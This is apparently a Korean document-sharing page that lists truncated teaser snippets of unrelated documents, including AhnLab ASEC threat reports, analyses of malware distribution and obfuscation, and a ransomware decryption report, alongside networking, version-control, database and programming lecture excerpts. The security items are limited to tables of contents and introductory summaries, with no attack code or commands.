More information목차 개요... 3 공격현황... 4 공격방식... 7 스피어피싱 (Spear Phishing) 이메일... 7 워터링홀 (Watering hole)... 7 중앙관리시스템... 8 국내외주요공격사례... 8 국내사례 Icefog-NG 변형 오퍼레
2017.07.03 국내방위산업체공격동향보고서 안랩시큐리티대응센터 (ASEC) 분석팀 경기도성남시분당구판교역로 220 ( 우 ) 13493 대표전화 : 031-722-8000 팩스 : 031-722-8901 www.ahnlab.com AhnLab, Inc. All rights reserved. 목차 개요... 3 공격현황... 4 공격방식... 7 스피어피싱
More informationSecurity Trend ASEC Report VOL.52 April, 2014
Security Trend ASEC Report VOL.52 April, 2014 ASEC Report VOL.52 April, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다. 2010 년 11 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 11월의악성코드감염보고는 TextImage/Autorun이
More information슬라이드 1
TortoiseSVN 1. 도구개요 2. 설치및실행 3. 주요기능 4. 활용예제 1. 도구개요 1.1 도구정보요약 도구명 Tortoise SVN (http://tortoisesvn.net) 라이선스 GNU GPL v2.0 소개 Subversion 를통해서소스버전관리를할수있게하는클라이언트도구 특징 Windows Explorer 에서곧바로 Subversion 를사용하여버전컨트롤가능
More information<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>
#include "stdafx.h" #include "Huffman.h" 1 /* 비트의부분을뽑아내는함수 */ unsigned HF::bits(unsigned x, int k, int j) return (x >> k) & ~(~0
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More informationMicrosoft PowerPoint - 6.pptx
DB 암호화업데이트 2011. 3. 15 KIM SUNGJIN ( 주 ) 비에이솔루션즈 1 IBM iseries 암호화구현방안 목차 목 차 정부시책및방향 제정안특이사항 기술적보호조치기준고시 암호화구현방안 암호화적용구조 DB 암호화 Performance Test 결과 암호화적용구조제안 [ 하이브리드방식 ] 2 IBM iseries 암호화구현방안 정부시책및방향
More informationEQST Insight_201910
Special Report WannaCryFake 랜섬웨어분석및복호화도구활용 개요 공격자들이금전적이득을위한수단으로랜섬웨어 (Ransomware) 를이용한지수년이지났고그비율도점차감소하고있다. 하지만기존랜섬웨어를변형하여재사용하는변종공격이꾸준히발견되고있어주의가요구된다. 랜섬웨어는몸값을의미하는 Ransom 과 Software 의합성어로, 파일을인질로몸값을요구하며개인
More information슬라이드 1
악성코드유포에홗용되는 난독화기법분석 이민섭 NBP 포털서비스보앆팀 c 2011 NHN CORPORATION 목차 1. 악성코드유포및감염 2. 최근웹사이트공격동향 3. 난독화공격코드 3.1 난독화에대한정의 3.2 공격코드의난독화주요방법 3.3 난독화공격코드사례 4. 악성코드바이너리의특징과목적 5. 결롞 1. 악성코드유포및감염 1. 악성코드유포및감염 이메일첨부파일을이용한악성코드유포
More informationASEC REPORT VOL
ASEC REPORT VOL.46 2013.10 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More informationPowerPoint 프레젠테이션
BOOTLOADER Jo, Heeseung 부트로더컴파일 부트로더소스복사및압축해제 부트로더소스는웹페이지에서다운로드 /working 디렉터리로이동한후, wget으로다운로드 이후작업은모두 /working 디렉터리에서진행 root@ubuntu:# cp /media/sm5-linux-111031/source/platform/uboot-s4210.tar.bz2 /working
More informationCONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안
ASEC REPORT VOL.47 2013.11 CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴
More information(Microsoft PowerPoint - \301\24613\260\255 - oFusion \276\300 \261\270\274\272)
게임엔진 제 13 강 ofusion 씬구성 이대현교수 한국산업기술대학교게임공학과 학습목차 Ofusion 을이용한 export Export 된씬의재현 씬노드애니메이션을이용한수동카메라트래킹 ofusion OGRE3D 엔진용 3D MAX 익스포터 http://www.ofusiontechnologies.com ofusion 의특징 Realtime Viewport 3D
More informationASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하
Security Trend ASEC REPORT VOL.78 June, 2016 ASEC REPORT VOL.78 June, 2016 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정
More informationⅠ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-
Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top 20 이다. 2010 년 2 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 20 2010년 2월의악성코드감염보고는 Win32/Induc이
More information